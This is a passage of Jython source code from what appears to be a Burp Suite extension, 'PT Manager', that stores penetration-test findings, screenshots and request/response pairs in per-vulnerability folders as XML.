self._lock.acquire() row = self._log.size() vulnObject = vulnerability(self.vulnName.getText(),self.threatLevel.getSelectedItem(),self.descriptionString.getText(),self.mitigationStr.getText() ,colorTxt) self._log.add(vulnObject) self.fireTableRowsInserted(row, row) self._lock.release() vulnPath = self.projPath.getText() + "/" + self.clearStr(self.vulnName.getText()) if not os.path.exists(vulnPath): os.makedirs(vulnPath) xml = ET.Element('vulnerability') name = ET.SubElement(xml, "name") severity = ET.SubElement(xml, "severity") description = ET.SubElement(xml, "description") mitigation = ET.SubElement(xml, "mitigation") color = ET.SubElement(xml, "color") name.text = self.vulnName.getText() severity.text = self.threatLevel.getSelectedItem() description.text = self.descriptionString.getText() mitigation.text = self.mitigationStr.getText() color.text = colorTxt tree = ET.ElementTree(xml) tree.write(vulnPath+'/vulnerability.xml') self.loadVulnerabilities(self.getCurrentProjPath()) self.loadVulnerability(vulnObject) def vulnNameChanged(self): if os.path.exists(self.getCurrentVulnPath()) and self.vulnName.getText() != "": self.addButton.setText("Update") elif self.addButton.getText() != "Add": options = ["Create a new vulnerability", "Change current vulnerability name"] n = JOptionPane.showOptionDialog(None, "Would you like to?", "Vulnerability Name", JOptionPane.YES_NO_CANCEL_OPTION, JOptionPane.QUESTION_MESSAGE, None, options, options[0]); if n == 0: self.clearVulnerabilityTab(False) self.addButton.setText("Add") else: newName = JOptionPane.showInputDialog( None, "Enter new name:", "Vulnerability Name", JOptionPane.PLAIN_MESSAGE, None, None, self.vulnName.getText()) row = self.logTable.getSelectedRow() old = self.logTable.getValueAt(row,1) self.changeVulnName(newName,old) def changeVulnName(self,new,old): newpath = self.getCurrentProjPath() + "/" + new oldpath = self.getCurrentProjPath() + "/" + old os.rename(oldpath,newpath) self.changeCurrentVuln(new,0, newpath + "/vulnerability.xml") def getCurrentVulnPath(self): return self.projPath.getText() + "/" + self.clearStr(self.vulnName.getText()) def getCurrentProjPath(self): return self.projPath.getText() def loadSS(self, imgPath): image = ImageIO.read(File(imgPath)) if image.getWidth() <= 550 and image.getHeight() <= 400: self.firstPic.setIcon(ImageIcon(image)) self.firstPic.setSize(image.getWidth(),image.getHeight()) else: self.firstPic.setIcon(ImageIcon(self.resize(image,550, 400))) self.firstPic.setSize(550,400) def clearProjectTab(self): self.projPath.setText("") self.projDetails.setText("") def clearList(self, event): self._lock.acquire() self._log = ArrayList() row = self._log.size() self.fireTableRowsInserted(row, row) self._lock.release() # # implement IContextMenuFactory # def createMenuItems(self, invocation): responses = invocation.getSelectedMessages(); if responses > 0: ret = LinkedList() requestMenuItem = JMenuItem("Send to PT Manager"); requestMenuItem.addActionListener(handleMenuItems(self,responses[0], "request")) ret.add(requestMenuItem); return(ret); return null; # # implement ITab # def getTabCaption(self): return "PT Manager" def getUiComponent(self): return self._splitpane # # extend AbstractTableModel # def getRowCount(self): try: return self._log.size() except: return 0 def getColumnCount(self): return 3 def getColumnName(self, columnIndex): if columnIndex == 0: return "#" if columnIndex == 1: return "Vulnerability Name" if columnIndex == 2: return "Threat Level" return "" def getValueAt(self, rowIndex, columnIndex): vulnObject = self._log.get(rowIndex) if columnIndex == 0: return rowIndex+1 if columnIndex == 1: return vulnObject.getName() if columnIndex == 2: return vulnObject.getSeverity() if columnIndex == 3: return vulnObject.getMitigation() if columnIndex == 4: return vulnObject.getColor() return "" def changeCurrentVuln(self,value,fieldNumber, xmlPath = "def"): if xmlPath == "def": xmlPath = self.getCurrentVulnPath() + "/vulnerability.xml" document = self.getXMLDoc(xmlPath) nodeList = document.getDocumentElement().getChildNodes() nodeList.item(fieldNumber).setTextContent(value) self.saveXMLDoc(document, xmlPath) self.loadVulnerabilities(self.getCurrentProjPath()) def loadVulnerability(self, vulnObject): self.addButton.setText("Update") self.vulnName.setText(vulnObject.getName()) self.threatLevel.setSelectedItem(vulnObject.getSeverity()) self.descriptionString.setText(vulnObject.getDescription()) self.mitigationStr.setText(vulnObject.getMitigation()) if vulnObject.getColor() == "" or vulnObject.getColor() == None: self.colorCombo.setSelectedItem("Color:") else: self.colorCombo.setSelectedItem(vulnObject.getColor()) self.screenshotsList.clear() for fileName in os.listdir(self.projPath.getText()+"/"+self.clearStr(vulnObject.getName())): if fileName.endswith(".jpg"): self.screenshotsList.addElement(fileName) imgPath = self.projPath.getText()+"/"+self.clearStr(vulnObject.getName())+'/'+fileName # imgPath = imgPath.replace("/","//") self.loadSS(imgPath) if (self.screenshotsList.getSize() == 0): self.firstPic.setIcon(None) else: self.ssList.setSelectedIndex(0) path = self.getVulnReqResPath("request",vulnObject.getName()) if os.path.exists(path): f = self.getFileContent(path) self._requestViewer.setMessage(f, False) else: self._requestViewer.setMessage("None", False) path = self.getVulnReqResPath("response",vulnObject.getName()) if os.path.exists(path): f = self.getFileContent(path) self._responseViewer.setMessage(f, False) else: self._responseViewer.setMessage("None", False)